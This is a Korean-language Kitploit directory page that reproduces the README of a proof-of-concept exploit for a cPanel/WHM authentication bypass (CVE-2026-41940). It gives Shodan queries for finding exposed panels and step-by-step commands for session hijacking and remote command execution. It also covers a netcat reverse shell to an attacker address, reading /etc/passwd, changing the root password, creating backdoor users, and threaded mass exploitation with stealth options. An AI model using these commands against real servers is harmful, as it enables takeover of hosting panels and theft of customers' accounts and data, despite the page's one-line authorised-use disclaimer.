Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41940-PoC-Exploit — 🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - 최적의 플로우 💥 CRLF 인젝션으로 인증 우회, 세션 하이재킹 및 계정 유출을 유발합니다. ✅ 프록시, 커스텀 UA, keep-alive, 재시도, SSL 검증, 컬러 출력, 파일 저장 지원. ⚡ 침투 테스터를 위한 고급 PoC. | Kitploit
도구/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
Authentication & AuthorizationPrivilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration TestingCommand and Control

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Red Teaming
Payload Development
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - 최적의 플로우 💥 CRLF 인젝션으로 인증 우회, 세션 하이재킹 및 계정 유출을 유발합니다. ✅ 프록시, 커스텀 UA, keep-alive, 재시도, SSL 검증, 컬러 출력, 파일 저장 지원. ⚡ 침투 테스터를 위한 고급 PoC.

저장소 보기
921개월 전아직 검토되지 않음

CVE-2026-41940

🚀 CVE-2026-41940 - cPanel/WHM 인증 우회 익스플로잇

Python License CVSS Pentesting

cPanel & WHM 에디션 - CRLF 주입을 통한 인증 우회 및 완전한 세션 하이재킹

📌 개요

이 익스플로잇은 cPanel/WHM의 치명적인 인증 우회 취약점인 CVE-2026-41940을 악용합니다. 세션 관리 시스템에 정교하게 제작된 CRLF 페이로드를 주입하여 유효한 자격 증명 없이도 세션 하이재킹, 루트 액세스, 그리고 호스팅 패널에 대한 완전한 제어를 달성합니다.

🔥 주요 기능

카테고리기능
공격✅ CRLF 주입을 통한 인증 우회
✅ WHM 세션 하이재킹
✅ 보안 토큰 유출
✅ 즉시 루트 액세스
사후 공격✅ 계정 목록 추출 (사용자 + 도메인)
✅ 원격 명령 실행 (RCE)
✅ 리버스 셸 (netcat 호환)
✅ 파일 읽기 (설정 파일, 로그 등)
✅ 루트 비밀번호 변경
✅ 새 cPanel 사용자 생성
스캐닝✅ 단일 대상 공격
✅ 다중 대상 대량 스캔
✅ 멀티스레딩 (스레드 수 설정 가능)
✅ 포트 오버라이드 지원
은닉✅ 요청 간 랜덤 지연
✅ X-Forwarded-For 스푸핑
✅ 커스텀 User-Agent 지원
✅ 프록시 지원 (HTTP/HTTPS)
사용성✅ 인터랙티브 WHM 셸 (-i)
✅ 컬러 출력 (colorama)
✅ 상세/디버그 모드
✅ 계정 목록 파일 내보내기
✅ Keep-Alive 세션 스레드
✅ 불안정한 연결을 위한 재시도 메커니즘

🎯 취약한 버전

📍 Shodan 검색

root@kitploit:~
port:2087 "cPanel" "WHM"
port:2083 "cPanel"

⚠️ 고지사항: 이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다. 무단 접근은 불법입니다.

📦 설치

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

🛠️ 사용 예시

root@kitploit:~
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

💻 인터랙티브 셸 명령어

root@kitploit:~
[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

## 🔧 원격 명령 실행

```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

🌐 리버스 셸

root@kitploit:~
# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

🔐 사후 공격 작업

root@kitploit:~
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

📊 대량 공격 (다중 대상)

root@kitploit:~
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

⚙️ 고급 옵션

root@kitploit:~
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

📊 명령줄 인자

🧪 테스트 환경

Docker (안전하게 테스트하려면)

docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

또는 취약한 버전으로

docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102

🔗 관련 익스플로잇

제 다른 익스플로잇 저장소도 확인해 보세요:

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
도구 다운로드
제품
버전
상태
cPanel & WHM11.92 - 11.102✅ 확인됨
cPanel & WHM11.104 - 11.110✅ 확인됨
cPanel & WHM11.118 - 11.136⚠️ 제한적
cPanel & WHM< 11.86✅ 취약할 가능성 있음
짧은 옵션긴 옵션설명기본값
-t--target단일 대상 URL필수 (단일)
-l--target-file대상 목록이 포함된 파일필수 (대량)
-p--port포트 오버라이드자동 감지
-o--output계정 목록을 파일로 저장없음
-v--verbose디버그 출력 활성화False
-i--interactive인터랙티브 WHM 셸False
--proxyHTTP/HTTPS 프록시없음
-ua--user-agent커스텀 User-Agent랜덤
--cmd단일 명령 실행없음
--reverse-shell리버스 셸 IP:PORT없음
--passwd루트 비밀번호 변경없음
--adduser새 사용자 생성 (USER DOMAIN PASS)없음
--read대상에서 파일 읽기없음
--threads대량 스캔용 스레드 수10
--delayKeep-Alive 간격 (초)3.0
--max-retries요청당 최대 재시도 횟수3
--no-keep-alive세션 유지 안 함False
--ssl-verifySSL 인증서 검증False